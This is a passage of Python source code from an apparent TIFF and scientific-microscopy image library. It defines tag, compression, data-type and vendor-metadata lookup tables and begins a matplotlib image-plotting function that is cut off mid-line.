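# e.g. TIFF_SUBFILE_TYPES()[5] == ('reduced_image', 'mask').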
TIFF_PHOTOMETRICS = {
0: 'miniswhite',
1: 'minisblack',
2: 'rgb',
3: 'palette',
4: 'mask',
5: 'separated', # CMYK
6: 'ycbcr',
8: 'cielab',
9: 'icclab',
10: 'itulab',
32803: 'cfa', # Color Filter Array
32844: 'logl',
32845: 'logluv',
34892: 'linear_raw'
}
TIFF_COMPESSIONS = {
1: None,
2: 'ccittrle',
3: 'ccittfax3',
4: 'ccittfax4',
5: 'lzw',
6: 'ojpeg',
7: 'jpeg',
8: 'adobe_deflate',
9: 't85',
10: 't43',
32766: 'next',
32771: 'ccittrlew',
32773: 'packbits',
32809: 'thunderscan',
32895: 'it8ctpad',
32896: 'it8lw',
32897: 'it8mp',
32898: 'it8bl',
32908: 'pixarfilm',
32909: 'pixarlog',
32946: 'deflate',
32947: 'dcs',
34661: 'jbig',
34676: 'sgilog',
34677: 'sgilog24',
34712: 'jp2000',
34713: 'nef',
}
TIFF_DECOMPESSORS = {
None: lambda x: x,
'adobe_deflate': zlib.decompress,
'deflate': zlib.decompress,
'packbits': decodepackbits,
'lzw': decodelzw,
# 'jpeg': decodejpg
}
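# Dispatch sketch (illustrative; 'compressed_bytes' is a hypothetical
# variable): strip data is decompressed by looking up the page's
# compression scheme in this table.
#
#   decode = TIFF_DECOMPESSORS['lzw']
#   data = decode(compressed_bytes)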
TIFF_DATA_TYPES = {
1: '1B', # BYTE 8-bit unsigned integer.
2: '1s', # ASCII 8-bit byte that contains a 7-bit ASCII code;
# the last byte must be NULL (binary zero).
3: '1H', # SHORT 16-bit (2-byte) unsigned integer
4: '1I', # LONG 32-bit (4-byte) unsigned integer.
5: '2I', # RATIONAL Two LONGs: the first represents the numerator of
# a fraction; the second, the denominator.
6: '1b', # SBYTE An 8-bit signed (twos-complement) integer.
7: '1s', # UNDEFINED An 8-bit byte that may contain anything,
# depending on the definition of the field.
8: '1h', # SSHORT A 16-bit (2-byte) signed (twos-complement) integer.
9: '1i', # SLONG A 32-bit (4-byte) signed (twos-complement) integer.
10: '2i', # SRATIONAL Two SLONGs: the first represents the numerator
# of a fraction, the second the denominator.
11: '1f', # FLOAT Single precision (4-byte) IEEE format.
12: '1d', # DOUBLE Double precision (8-byte) IEEE format.
13: '1I', # IFD unsigned 4 byte IFD offset.
#14: '', # UNICODE
#15: '', # COMPLEX
16: '1Q', # LONG8 unsigned 8 byte integer (BigTiff)
17: '1q', # SLONG8 signed 8 byte integer (BigTiff)
18: '1Q', # IFD8 unsigned 8 byte IFD offset (BigTiff)
}
TIFF_SAMPLE_FORMATS = {
1: 'uint',
2: 'int',
3: 'float',
#4: 'void',
#5: 'complex_int',
6: 'complex',
}
TIFF_SAMPLE_DTYPES = {
('uint', 1): '?', # bitmap
('uint', 2): 'B',
('uint', 3): 'B',
('uint', 4): 'B',
('uint', 5): 'B',
('uint', 6): 'B',
('uint', 7): 'B',
('uint', 8): 'B',
('uint', 9): 'H',
('uint', 10): 'H',
('uint', 11): 'H',
('uint', 12): 'H',
('uint', 13): 'H',
('uint', 14): 'H',
('uint', 15): 'H',
('uint', 16): 'H',
('uint', 17): 'I',
('uint', 18): 'I',
('uint', 19): 'I',
('uint', 20): 'I',
('uint', 21): 'I',
('uint', 22): 'I',
('uint', 23): 'I',
('uint', 24): 'I',
('uint', 25): 'I',
('uint', 26): 'I',
('uint', 27): 'I',
('uint', 28): 'I',
('uint', 29): 'I',
('uint', 30): 'I',
('uint', 31): 'I',
('uint', 32): 'I',
('uint', 64): 'Q',
('int', 8): 'b',
('int', 16): 'h',
('int', 32): 'i',
('int', 64): 'q',
('float', 16): 'e',
('float', 32): 'f',
('float', 64): 'd',
('complex', 64): 'F',
('complex', 128): 'D',
('uint', (5, 6, 5)): 'B',
}
TIFF_ORIENTATIONS = {
1: 'top_left',
2: 'top_right',
3: 'bottom_right',
4: 'bottom_left',
5: 'left_top',
6: 'right_top',
7: 'right_bottom',
8: 'left_bottom',
}
# TODO: is there a standard for character axes labels?
AXES_LABELS = {
'X': 'width',
'Y': 'height',
'Z': 'depth',
'S': 'sample', # rgb(a)
'I': 'series', # general sequence, plane, page, IFD
'T': 'time',
'C': 'channel', # color, emission wavelength
'A': 'angle',
'P': 'phase', # formerly F # P is Position in LSM!
'R': 'tile', # region, point, mosaic
'H': 'lifetime', # histogram
'E': 'lambda', # excitation wavelength
'L': 'exposure', # lux
'V': 'event',
'Q': 'other',
#'M': 'mosaic', # LSM 6
}
AXES_LABELS.update(dict((v, k) for k, v in AXES_LABELS.items()))
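# After the update the mapping works in both directions, e.g.
# AXES_LABELS['X'] == 'width' and AXES_LABELS['width'] == 'X'.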
# Map OME pixel types to numpy dtype
OME_PIXEL_TYPES = {
'int8': 'i1',
'int16': 'i2',
'int32': 'i4',
'uint8': 'u1',
'uint16': 'u2',
'uint32': 'u4',
'float': 'f4',
# 'bit': 'bit',
'double': 'f8',
'complex': 'c8',
'double-complex': 'c16',
}
# NIH Image PicHeader v1.63
NIH_IMAGE_HEADER = [
('fileid', 'a8'),
('nlines', 'i2'),
('pixelsperline', 'i2'),
('version', 'i2'),
('oldlutmode', 'i2'),
('oldncolors', 'i2'),
('colors', 'u1', (3, 32)),
('oldcolorstart', 'i2'),
('colorwidth', 'i2'),
('extracolors', 'u2', (6, 3)),
('nextracolors', 'i2'),
('foregroundindex', 'i2'),
('backgroundindex', 'i2'),
('xscale', 'f8'),
('_x0', 'i2'),
('_x1', 'i2'),
('units_t', 'i2'), # NIH_UNITS_TYPE
('p1', [('x', 'i2'), ('y', 'i2')]),
('p2', [('x', 'i2'), ('y', 'i2')]),
('curvefit_t', 'i2'), # NIH_CURVEFIT_TYPE
('ncoefficients', 'i2'),
('coeff', 'f8', 6),
('_um_len', 'u1'),
('um', 'a15'),
('_x2', 'u1'),
('binarypic', 'b1'),
('slicestart', 'i2'),
('sliceend', 'i2'),
('scalemagnification', 'f4'),
('nslices', 'i2'),
('slicespacing', 'f4'),
('currentslice', 'i2'),
('frameinterval', 'f4'),
('pixelaspectratio', 'f4'),
('colorstart', 'i2'),
('colorend', 'i2'),
('ncolors', 'i2'),
('fill1', '3u2'),
('fill2', '3u2'),
('colortable_t', 'u1'), # NIH_COLORTABLE_TYPE
('lutmode_t', 'u1'), # NIH_LUTMODE_TYPE
('invertedtable', 'b1'),
('zeroclip', 'b1'),
('_xunit_len', 'u1'),
('xunit', 'a11'),
('stacktype_t', 'i2'), # NIH_STACKTYPE_TYPE
]
NIH_COLORTABLE_TYPE = (
'CustomTable', 'AppleDefault', 'Pseudo20', 'Pseudo32', 'Rainbow',
'Fire1', 'Fire2', 'Ice', 'Grays', 'Spectrum')
NIH_LUTMODE_TYPE = (
'PseudoColor', 'OldAppleDefault', 'OldSpectrum', 'GrayScale',
'ColorLut', 'CustomGrayscale')
NIH_CURVEFIT_TYPE = (
'StraightLine', 'Poly2', 'Poly3', 'Poly4', 'Poly5', 'ExpoFit',
'PowerFit', 'LogFit', 'RodbardFit', 'SpareFit1', 'Uncalibrated',
'UncalibratedOD')
NIH_UNITS_TYPE = (
'Nanometers', 'Micrometers', 'Millimeters', 'Centimeters', 'Meters',
'Kilometers', 'Inches', 'Feet', 'Miles', 'Pixels', 'OtherUnits')
NIH_STACKTYPE_TYPE = (
'VolumeStack', 'RGBStack', 'MovieStack', 'HSVStack')
# Map Universal Imaging Corporation MetaMorph internal tag ids to name and type
UIC_TAGS = {
0: ('auto_scale', int),
1: ('min_scale', int),
2: ('max_scale', int),
3: ('spatial_calibration', int),
4: ('x_calibration', Fraction),
5: ('y_calibration', Fraction),
6: ('calibration_units', str),
7: ('name', str),
8: ('thresh_state', int),
9: ('thresh_state_red', int),
10: ('tagid_10', None), # undefined
11: ('thresh_state_green', int),
12: ('thresh_state_blue', int),
13: ('thresh_state_lo', int),
14: ('thresh_state_hi', int),
15: ('zoom', int),
16: ('create_time', julian_datetime),
17: ('last_saved_time', julian_datetime),
18: ('current_buffer', int),
19: ('gray_fit', None),
20: ('gray_point_count', None),
21: ('gray_x', Fraction),
22: ('gray_y', Fraction),
23: ('gray_min', Fraction),
24: ('gray_max', Fraction),
25: ('gray_unit_name', str),
26: ('standard_lut', int),
27: ('wavelength', int),
28: ('stage_position', '(%i,2,2)u4'), # N xy positions as fractions
29: ('camera_chip_offset', '(%i,2,2)u4'), # N xy offsets as fractions
30: ('overlay_mask', None),
31: ('overlay_compress', None),
32: ('overlay', None),
33: ('special_overlay_mask', None),
34: ('special_overlay_compress', None),
35: ('special_overlay', None),
36: ('image_property', read_uic_image_property),
37: ('stage_label', '%ip'), # N str
38: ('autoscale_lo_info', Fraction),
39: ('autoscale_hi_info', Fraction),
40: ('absolute_z', '(%i,2)u4'), # N fractions
41: ('absolute_z_valid', '(%i,)u4'), # N long
42: ('gamma', int),
43: ('gamma_red', int),
44: ('gamma_green', int),
45: ('gamma_blue', int),
46: ('camera_bin', int),
47: ('new_lut', int),
48: ('image_property_ex', None),
49: ('plane_property', int),
50: ('user_lut_table', '(256,3)u1'),
51: ('red_autoscale_info', int),
52: ('red_autoscale_lo_info', Fraction),
53: ('red_autoscale_hi_info', Fraction),
54: ('red_minscale_info', int),
55: ('red_maxscale_info', int),
56: ('green_autoscale_info', int),
57: ('green_autoscale_lo_info', Fraction),
58: ('green_autoscale_hi_info', Fraction),
59: ('green_minscale_info', int),
60: ('green_maxscale_info', int),
61: ('blue_autoscale_info', int),
62: ('blue_autoscale_lo_info', Fraction),
63: ('blue_autoscale_hi_info', Fraction),
64: ('blue_min_scale_info', int),
65: ('blue_max_scale_info', int),
#66: ('overlay_plane_color', read_uic_overlay_plane_color),
}
# Olympus FluoView
MM_DIMENSION = [
('name', 'a16'),
('size', 'i4'),
('origin', 'f8'),
('resolution', 'f8'),
('unit', 'a64'),
]
MM_HEADER = [
('header_flag', 'i2'),
('image_type', 'u1'),
('image_name', 'a257'),
('offset_data', 'u4'),
('palette_size', 'i4'),
('offset_palette0', 'u4'),
('offset_palette1', 'u4'),
('comment_size', 'i4'),
('offset_comment', 'u4'),
('dimensions', MM_DIMENSION, 10),
('offset_position', 'u4'),
('map_type', 'i2'),
('map_min', 'f8'),
('map_max', 'f8'),
('min_value', 'f8'),
('max_value', 'f8'),
('offset_map', 'u4'),
('gamma', 'f8'),
('offset', 'f8'),
('gray_channel', MM_DIMENSION),
('offset_thumbnail', 'u4'),
('voice_field', 'i4'),
('offset_voice_field', 'u4'),
]
# Carl Zeiss LSM
CZ_LSM_INFO = [
('magic_number', 'u4'),
('structure_size', 'i4'),
('dimension_x', 'i4'),
('dimension_y', 'i4'),
('dimension_z', 'i4'),
('dimension_channels', 'i4'),
('dimension_time', 'i4'),
('data_type', 'i4'), # CZ_DATA_TYPES
('thumbnail_x', 'i4'),
('thumbnail_y', 'i4'),
('voxel_size_x', 'f8'),
('voxel_size_y', 'f8'),
('voxel_size_z', 'f8'),
('origin_x', 'f8'),
('origin_y', 'f8'),
('origin_z', 'f8'),
('scan_type', 'u2'),
('spectral_scan', 'u2'),
('type_of_data', 'u4'), # CZ_TYPE_OF_DATA
('offset_vector_overlay', 'u4'),
('offset_input_lut', 'u4'),
('offset_output_lut', 'u4'),
('offset_channel_colors', 'u4'),
('time_interval', 'f8'),
('offset_channel_data_types', 'u4'),
('offset_scan_info', 'u4'), # CZ_LSM_SCAN_INFO
('offset_ks_data', 'u4'),
('offset_time_stamps', 'u4'),
('offset_event_list', 'u4'),
('offset_roi', 'u4'),
('offset_bleach_roi', 'u4'),
('offset_next_recording', 'u4'),
# LSM 2.0 ends here
('display_aspect_x', 'f8'),
('display_aspect_y', 'f8'),
('display_aspect_z', 'f8'),
('display_aspect_time', 'f8'),
('offset_mean_of_roi_overlay', 'u4'),
('offset_topo_isoline_overlay', 'u4'),
('offset_topo_profile_overlay', 'u4'),
('offset_linescan_overlay', 'u4'),
('offset_toolbar_flags', 'u4'),
('offset_channel_wavelength', 'u4'),
('offset_channel_factors', 'u4'),
('objective_sphere_correction', 'f8'),
('offset_unmix_parameters', 'u4'),
# LSM 3.2, 4.0 end here
('offset_acquisition_parameters', 'u4'),
('offset_characteristics', 'u4'),
('offset_palette', 'u4'),
('time_difference_x', 'f8'),
('time_difference_y', 'f8'),
('time_difference_z', 'f8'),
('internal_use_1', 'u4'),
('dimension_p', 'i4'),
('dimension_m', 'i4'),
('dimensions_reserved', '16i4'),
('offset_tile_positions', 'u4'),
('reserved_1', '9u4'),
('offset_positions', 'u4'),
('reserved_2', '21u4'), # must be 0
]
# Import functions for LSM_INFO sub-records
CZ_LSM_INFO_READERS = {
'scan_info': read_cz_lsm_scan_info,
'time_stamps': read_cz_lsm_time_stamps,
'event_list': read_cz_lsm_event_list,
'channel_colors': read_cz_lsm_floatpairs,
'positions': read_cz_lsm_floatpairs,
'tile_positions': read_cz_lsm_floatpairs,
}
# Map cz_lsm_info.scan_type to dimension order
CZ_SCAN_TYPES = {
0: 'XYZCT', # x-y-z scan
1: 'XYZCT', # z scan (x-z plane)
2: 'XYZCT', # line scan
3: 'XYTCZ', # time series x-y
4: 'XYZTC', # time series x-z
5: 'XYTCZ', # time series 'Mean of ROIs'
6: 'XYZTC', # time series x-y-z
7: 'XYCTZ', # spline scan
8: 'XYCZT', # spline scan x-z
9: 'XYTCZ', # time series spline plane x-z
10: 'XYZCT', # point mode
}
# Map dimension codes to cz_lsm_info attribute
CZ_DIMENSIONS = {
'X': 'dimension_x',
'Y': 'dimension_y',
'Z': 'dimension_z',
'C': 'dimension_channels',
'T': 'dimension_time',
}
# Description of cz_lsm_info.data_type
CZ_DATA_TYPES = {
0: 'varying data types',
1: '8 bit unsigned integer',
2: '12 bit unsigned integer',
5: '32 bit float',
}
# Description of cz_lsm_info.type_of_data
CZ_TYPE_OF_DATA = {
0: 'Original scan data',
1: 'Calculated data',
2: '3D reconstruction',
3: 'Topography height map',
}
CZ_LSM_SCAN_INFO_ARRAYS = {
0x20000000: "tracks",
0x30000000: "lasers",
0x60000000: "detection_channels",
0x80000000: "illumination_channels",
0xa0000000: "beam_splitters",
0xc0000000: "data_channels",
0x11000000: "timers",
0x13000000: "markers",
}
CZ_LSM_SCAN_INFO_STRUCTS = {
# 0x10000000: "recording",
0x40000000: "track",
0x50000000: "laser",
0x70000000: "detection_channel",
0x90000000: "illumination_channel",
0xb0000000: "beam_splitter",
0xd0000000: "data_channel",
0x12000000: "timer",
0x14000000: "marker",
}
CZ_LSM_SCAN_INFO_ATTRIBUTES = {
# recording
0x10000001: "name",
0x10000002: "description",
0x10000003: "notes",
0x10000004: "objective",
0x10000005: "processing_summary",
0x10000006: "special_scan_mode",
0x10000007: "scan_type",
0x10000008: "scan_mode",
0x10000009: "number_of_stacks",
0x1000000a: "lines_per_plane",
0x1000000b: "samples_per_line",
0x1000000c: "planes_per_volume",
0x1000000d: "images_width",
0x1000000e: "images_height",
0x1000000f: "images_number_planes",
0x10000010: "images_number_stacks",
0x10000011: "images_number_channels",
0x10000012: "linscan_xy_size",
0x10000013: "scan_direction",
0x10000014: "time_series",
0x10000015: "original_scan_data",
0x10000016: "zoom_x",
0x10000017: "zoom_y",
0x10000018: "zoom_z",
0x10000019: "sample_0x",
0x1000001a: "sample_0y",
0x1000001b: "sample_0z",
0x1000001c: "sample_spacing",
0x1000001d: "line_spacing",
0x1000001e: "plane_spacing",
0x1000001f: "plane_width",
0x10000020: "plane_height",
0x10000021: "volume_depth",
0x10000023: "nutation",
0x10000034: "rotation",
0x10000035: "precession",
0x10000036: "sample_0time",
0x10000037: "start_scan_trigger_in",
0x10000038: "start_scan_trigger_out",
0x10000039: "start_scan_event",
0x10000040: "start_scan_time",
0x10000041: "stop_scan_trigger_in",
0x10000042: "stop_scan_trigger_out",
0x10000043: "stop_scan_event",
0x10000044: "stop_scan_time",
0x10000045: "use_rois",
0x10000046: "use_reduced_memory_rois",
0x10000047: "user",
0x10000048: "use_bc_correction",
0x10000049: "position_bc_correction1",
0x10000050: "position_bc_correction2",
0x10000051: "interpolation_y",
0x10000052: "camera_binning",
0x10000053: "camera_supersampling",
0x10000054: "camera_frame_width",
0x10000055: "camera_frame_height",
0x10000056: "camera_offset_x",
0x10000057: "camera_offset_y",
0x10000059: "rt_binning",
0x1000005a: "rt_frame_width",
0x1000005b: "rt_frame_height",
0x1000005c: "rt_region_width",
0x1000005d: "rt_region_height",
0x1000005e: "rt_offset_x",
0x1000005f: "rt_offset_y",
0x10000060: "rt_zoom",
0x10000061: "rt_line_period",
0x10000062: "prescan",
0x10000063: "scan_direction_z",
# track
0x40000001: "multiplex_type", # 0 after line; 1 after frame
0x40000002: "multiplex_order",
0x40000003: "sampling_mode", # 0 sample; 1 line average; 2 frame average
0x40000004: "sampling_method", # 1 mean; 2 sum
0x40000005: "sampling_number",
0x40000006: "acquire",
0x40000007: "sample_observation_time",
0x4000000b: "time_between_stacks",
0x4000000c: "name",
0x4000000d: "collimator1_name",
0x4000000e: "collimator1_position",
0x4000000f: "collimator2_name",
0x40000010: "collimator2_position",
0x40000011: "is_bleach_track",
0x40000012: "is_bleach_after_scan_number",
0x40000013: "bleach_scan_number",
0x40000014: "trigger_in",
0x40000015: "trigger_out",
0x40000016: "is_ratio_track",
0x40000017: "bleach_count",
0x40000018: "spi_center_wavelength",
0x40000019: "pixel_time",
0x40000021: "condensor_frontlens",
0x40000023: "field_stop_value",
0x40000024: "id_condensor_aperture",
0x40000025: "condensor_aperture",
0x40000026: "id_condensor_revolver",
0x40000027: "condensor_filter",
0x40000028: "id_transmission_filter1",
0x40000029: "id_transmission1",
0x40000030: "id_transmission_filter2",
0x40000031: "id_transmission2",
0x40000032: "repeat_bleach",
0x40000033: "enable_spot_bleach_pos",
0x40000034: "spot_bleach_posx",
0x40000035: "spot_bleach_posy",
0x40000036: "spot_bleach_posz",
0x40000037: "id_tubelens",
0x40000038: "id_tubelens_position",
0x40000039: "transmitted_light",
0x4000003a: "reflected_light",
0x4000003b: "simultan_grab_and_bleach",
0x4000003c: "bleach_pixel_time",
# laser
0x50000001: "name",
0x50000002: "acquire",
0x50000003: "power",
# detection_channel
0x70000001: "integration_mode",
0x70000002: "special_mode",
0x70000003: "detector_gain_first",
0x70000004: "detector_gain_last",
0x70000005: "amplifier_gain_first",
0x70000006: "amplifier_gain_last",
0x70000007: "amplifier_offs_first",
0x70000008: "amplifier_offs_last",
0x70000009: "pinhole_diameter",
0x7000000a: "counting_trigger",
0x7000000b: "acquire",
0x7000000c: "point_detector_name",
0x7000000d: "amplifier_name",
0x7000000e: "pinhole_name",
0x7000000f: "filter_set_name",
0x70000010: "filter_name",
0x70000013: "integrator_name",
0x70000014: "channel_name",
0x70000015: "detector_gain_bc1",
0x70000016: "detector_gain_bc2",
0x70000017: "amplifier_gain_bc1",
0x70000018: "amplifier_gain_bc2",
0x70000019: "amplifier_offset_bc1",
0x70000020: "amplifier_offset_bc2",
0x70000021: "spectral_scan_channels",
0x70000022: "spi_wavelength_start",
0x70000023: "spi_wavelength_stop",
0x70000026: "dye_name",
0x70000027: "dye_folder",
# illumination_channel
0x90000001: "name",
0x90000002: "power",
0x90000003: "wavelength",
0x90000004: "aquire",
0x90000005: "detchannel_name",
0x90000006: "power_bc1",
0x90000007: "power_bc2",
# beam_splitter
0xb0000001: "filter_set",
0xb0000002: "filter",
0xb0000003: "name",
# data_channel
0xd0000001: "name",
0xd0000003: "acquire",
0xd0000004: "color",
0xd0000005: "sample_type",
0xd0000006: "bits_per_sample",
0xd0000007: "ratio_type",
0xd0000008: "ratio_track1",
0xd0000009: "ratio_track2",
0xd000000a: "ratio_channel1",
0xd000000b: "ratio_channel2",
0xd000000c: "ratio_const1",
0xd000000d: "ratio_const2",
0xd000000e: "ratio_const3",
0xd000000f: "ratio_const4",
0xd0000010: "ratio_const5",
0xd0000011: "ratio_const6",
0xd0000012: "ratio_first_images1",
0xd0000013: "ratio_first_images2",
0xd0000014: "dye_name",
0xd0000015: "dye_folder",
0xd0000016: "spectrum",
0xd0000017: "acquire",
# timer
0x12000001: "name",
0x12000002: "description",
0x12000003: "interval",
0x12000004: "trigger_in",
0x12000005: "trigger_out",
0x12000006: "activation_time",
0x12000007: "activation_number",
# marker
0x14000001: "name",
0x14000002: "description",
0x14000003: "trigger_in",
0x14000004: "trigger_out",
}
# Map TIFF tag code to attribute name, default value, type, count, validator
TIFF_TAGS = {
254: ('new_subfile_type', 0, 4, 1, TIFF_SUBFILE_TYPES()),
255: ('subfile_type', None, 3, 1,
{0: 'undefined', 1: 'image', 2: 'reduced_image', 3: 'page'}),
256: ('image_width', None, 4, 1, None),
257: ('image_length', None, 4, 1, None),
258: ('bits_per_sample', 1, 3, 1, None),
259: ('compression', 1, 3, 1, TIFF_COMPESSIONS),
262: ('photometric', None, 3, 1, TIFF_PHOTOMETRICS),
266: ('fill_order', 1, 3, 1, {1: 'msb2lsb', 2: 'lsb2msb'}),
269: ('document_name', None, 2, None, None),
270: ('image_description', None, 2, None, None),
271: ('make', None, 2, None, None),
272: ('model', None, 2, None, None),
273: ('strip_offsets', None, 4, None, None),
274: ('orientation', 1, 3, 1, TIFF_ORIENTATIONS),
277: ('samples_per_pixel', 1, 3, 1, None),
278: ('rows_per_strip', 2**32-1, 4, 1, None),
279: ('strip_byte_counts', None, 4, None, None),
280: ('min_sample_value', None, 3, None, None),
281: ('max_sample_value', None, 3, None, None), # 2**bits_per_sample
282: ('x_resolution', None, 5, 1, None),
283: ('y_resolution', None, 5, 1, None),
284: ('planar_configuration', 1, 3, 1, {1: 'contig', 2: 'separate'}),
285: ('page_name', None, 2, None, None),
286: ('x_position', None, 5, 1, None),
287: ('y_position', None, 5, 1, None),
296: ('resolution_unit', 2, 4, 1, {1: 'none', 2: 'inch', 3: 'centimeter'}),
297: ('page_number', None, 3, 2, None),
305: ('software', None, 2, None, None),
306: ('datetime', None, 2, None, None),
315: ('artist', None, 2, None, None),
316: ('host_computer', None, 2, None, None),
317: ('predictor', 1, 3, 1, {1: None, 2: 'horizontal'}),
318: ('white_point', None, 5, 2, None),
319: ('primary_chromaticities', None, 5, 6, None),
320: ('color_map', None, 3, None, None),
322: ('tile_width', None, 4, 1, None),
323: ('tile_length', None, 4, 1, None),
324: ('tile_offsets', None, 4, None, None),
325: ('tile_byte_counts', None, 4, None, None),
338: ('extra_samples', None, 3, None,
{0: 'unspecified', 1: 'assocalpha', 2: 'unassalpha'}),
339: ('sample_format', 1, 3, 1, TIFF_SAMPLE_FORMATS),
340: ('smin_sample_value', None, None, None, None),
341: ('smax_sample_value', None, None, None, None),
347: ('jpeg_tables', None, 7, None, None),
530: ('ycbcr_subsampling', 1, 3, 2, None),
531: ('ycbcr_positioning', 1, 3, 1, None),
    32995: ('sgi_matteing', None, None, 1, None),  # use extra_samples
    32996: ('sgi_datatype', None, None, 1, None),  # use sample_format
32997: ('image_depth', None, 4, 1, None),
32998: ('tile_depth', None, 4, 1, None),
33432: ('copyright', None, 1, None, None),
33445: ('md_file_tag', None, 4, 1, None),
33446: ('md_scale_pixel', None, 5, 1, None),
33447: ('md_color_table', None, 3, None, None),
33448: ('md_lab_name', None, 2, None, None),
33449: ('md_sample_info', None, 2, None, None),
33450: ('md_prep_date', None, 2, None, None),
33451: ('md_prep_time', None, 2, None, None),
33452: ('md_file_units', None, 2, None, None),
33550: ('model_pixel_scale', None, 12, 3, None),
33922: ('model_tie_point', None, 12, None, None),
34665: ('exif_ifd', None, None, 1, None),
34735: ('geo_key_directory', None, 3, None, None),
34736: ('geo_double_params', None, 12, None, None),
34737: ('geo_ascii_params', None, 2, None, None),
34853: ('gps_ifd', None, None, 1, None),
37510: ('user_comment', None, None, None, None),
42112: ('gdal_metadata', None, 2, None, None),
42113: ('gdal_nodata', None, 2, None, None),
50289: ('mc_xy_position', None, 12, 2, None),
50290: ('mc_z_position', None, 12, 1, None),
50291: ('mc_xy_calibration', None, 12, 3, None),
50292: ('mc_lens_lem_na_n', None, 12, 3, None),
50293: ('mc_channel_name', None, 1, None, None),
50294: ('mc_ex_wavelength', None, 12, 1, None),
50295: ('mc_time_stamp', None, 12, 1, None),
50838: ('imagej_byte_counts', None, None, None, None),
65200: ('flex_xml', None, 2, None, None),
# code: (attribute name, default value, type, count, validator)
}
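# Example lookup (illustrative): TIFF_TAGS[259] yields
# ('compression', 1, 3, 1, TIFF_COMPESSIONS), i.e. attribute name,
# default value, TIFF data type code, value count, and validator mapping.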
# Map custom TIFF tag codes to attribute names and import functions
CUSTOM_TAGS = {
700: ('xmp', read_bytes),
34377: ('photoshop', read_numpy),
33723: ('iptc', read_bytes),
34675: ('icc_profile', read_bytes),
33628: ('uic1tag', read_uic1tag), # Universal Imaging Corporation STK
33629: ('uic2tag', read_uic2tag),
33630: ('uic3tag', read_uic3tag),
33631: ('uic4tag', read_uic4tag),
34361: ('mm_header', read_mm_header), # Olympus FluoView
34362: ('mm_stamp', read_mm_stamp),
34386: ('mm_user_block', read_bytes),
34412: ('cz_lsm_info', read_cz_lsm_info), # Carl Zeiss LSM
43314: ('nih_image_header', read_nih_image_header),
# 40001: ('mc_ipwinscal', read_bytes),
40100: ('mc_id_old', read_bytes),
50288: ('mc_id', read_bytes),
50296: ('mc_frame_properties', read_bytes),
50839: ('imagej_metadata', read_bytes),
51123: ('micromanager_metadata', read_json),
}
# Max line length of printed output
PRINT_LINE_LEN = 79
def imshow(data, title=None, vmin=0, vmax=None, cmap=None,
bitspersample=None, photometric='rgb', interpolation='nearest',
dpi=96, figure=None, subplot=111, maxdim=8192, **kwargs):
"""Plot n-dimensional images using matplotlib.pyplot.
Return figure, subplot and plot axis.
Requires pyplot already imported ``from matplotlib import pyplot``.
Parameters
----------
bitspersample : int or None
Number of bits per channel in integer RGB images.
photometric : {'miniswhite', 'minisblack', 'rgb', or 'palette'}
The color space of the image data.
title : str
Window and subplot title.
    figure : matplotlib.figure.Figure (optional)
        Matplotlib figure to use for plotting.
subplot : int
A matplotlib.pyplot.subplot axis.
maxdim : int
        Maximum image size in any dimension.
kwargs : optional
Arguments for matplotlib.pyplot.imshow.
"""
#if photometric not in ('miniswhite', 'minisblack', 'rgb', 'palette'):
# raise ValueError("Can't handle %s photometrics" % photometric)
# TODO: handle photometric == 'separated' (CMYK)
isrgb = photometric in ('rgb', 'palette')
data = numpy.atleast_2d(data.squeeze())
data = data[(slice(0, maxdim), ) * len(data.shape)]
dims = data.ndim
if dims < 2:
raise ValueError("not an image")
elif dims == 2:
dims = 0
isrgb = False
else:
if isrgb and data.shape[-3] in (3, 4):
data = numpy.swapaxes(data, -3, -2)
data = numpy.swapaxes(data, -2, -1)
elif not isrgb and (data.shape[-1] < data.shape[-2] // 16 and
data.shape[-1] < data.shape[-3] // 16 and
data.shape[-1] < 5):
data = numpy.swapaxes(data, -3, -1)
data = numpy.swapaxes(data, -2, -1)
isrgb = isrgb and data.shape[-1] in (3, 4)
dims -= 3 if isrgb else 2
if photometric == 'palette' and isrgb:
datamax = data.max()
if datamax > 255:
data >>= 8 # possible precision loss
data = data.astype('B')
elif data.dtype.kind in 'ui':
if not (isrgb and data.dtype.itemsize <= 1) or bitspersample is None:
try:
bitspersample = int(math.ceil(math.log(data.max(), 2)))
except Exception:
bitspersample = data.dtype.itemsize * 8
elif not isinstance(bitspersample, int):
# bitspersample can be tuple, e.g. (5, 6, 5)
bitspersample = data.dtype.itemsize * 8
datamax = 2**bitspersample
if isrgb:
if bitspersample < 8:
data <<= 8 - bitspersample
elif bitspersample > 8:
data >>= bitspersample - 8 # precision loss
data = data.astype('B')
elif data.dtype.kind == 'f':
datamax = data.max()
if isrgb and datamax > 1.0:
if data.dtype.char == 'd':
data = data.astype('f')
data /= datamax
elif data.dtype.kind == 'b':
datamax = 1
elif data.dtype.kind == 'c':
raise NotImplementedError("complex type") # TODO: handle complex types
if not isrgb:
if vmax is None:
vmax = datamax
if vmin is None:
            if data.dtype.kind == 'i':
                dtmin = numpy.iinfo(data.dtype).min
                vmin = numpy.min(data)
                if vmin == dtmin:
                    vmin = numpy.min(data[data > dtmin])
            elif data.dtype.kind == 'f':
                dtmin = numpy.finfo(data.dtype).min
                vmin = numpy.min(data)
                if vmin == dtmin:
                    vmin = numpy.min(data[data > dtmin])
            else:
                vmin = 0
pyplot = sys.modules['matplotlib.pyplot']
if figure is None:
pyplot.rc('font', family='sans-serif', weight='normal', size=8)
figure = pyplot.figure(dpi=dpi, figsize=(10.3, 6.3), frameon=True,
facecolor='1.0', edgecolor='w')
try:
figure.canvas.manager.window.title(title)
except Exception:
pass
pyplot.subplots_adjust(bottom=0.03*(dims+2), top=0.9,
left=0.1, right=0.95, hspace=0.05, wspace=0.0)
subplot = pyplot.subplot(subplot)
if title:
try:
title = unicode(title, 'Windows-1252')
except TypeError:
pass
pyplot.title(title, size=11)
if cmap is None:
if data.dtype.kind in 'ubf' or vmin == 0:
cmap = 'cubehelix'
else:
cmap = 'coolwarm'
if photometric == 'miniswhite':
cmap += '_r'
image = pyplot.imshow(data[(0, ) * dims].squeeze(), vmin=vmin, vmax=vmax,
cmap=cmap, interpolation=interpolation, **kwargs)
if not isrgb:
pyplot.colorbar() # panchor=(0.55, 0.5), fraction=0.05
def format_coord(x, y):
# callback function to format coordinate display in toolbar
x = int(x + 0.5)
y = int(y + 0.5)
try:
if dims:
return "%s @ %s [%4i, %4i]" % (cur_ax_dat[1][y, x],
current, x, y)
else:
return "%s @ [%4i, %4i]" % (data[y, x], x, y)
except IndexError:
return ""
pyplot.gca().format_coord = format_coord
if dims:
current = list((0, ) * dims)
cur_ax_dat = [0, data[tuple(current)].squeeze()]
sliders = [pyplot.Slider(
pyplot.axes([0.125, 0.03*(axis+1), 0.725, 0.025]),
